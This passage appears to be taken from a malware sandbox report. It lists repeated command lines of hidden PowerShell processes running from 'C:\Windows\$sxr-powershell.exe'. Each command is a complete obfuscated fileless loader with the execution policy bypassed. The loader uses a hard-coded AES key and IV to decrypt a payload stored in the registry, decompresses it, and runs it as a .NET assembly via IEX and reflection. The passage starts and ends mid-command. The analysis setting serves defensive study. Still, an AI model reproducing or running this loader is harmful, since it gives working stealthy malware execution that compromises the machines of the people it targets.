'').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:5584
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:5216
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:2380
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:5772
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, 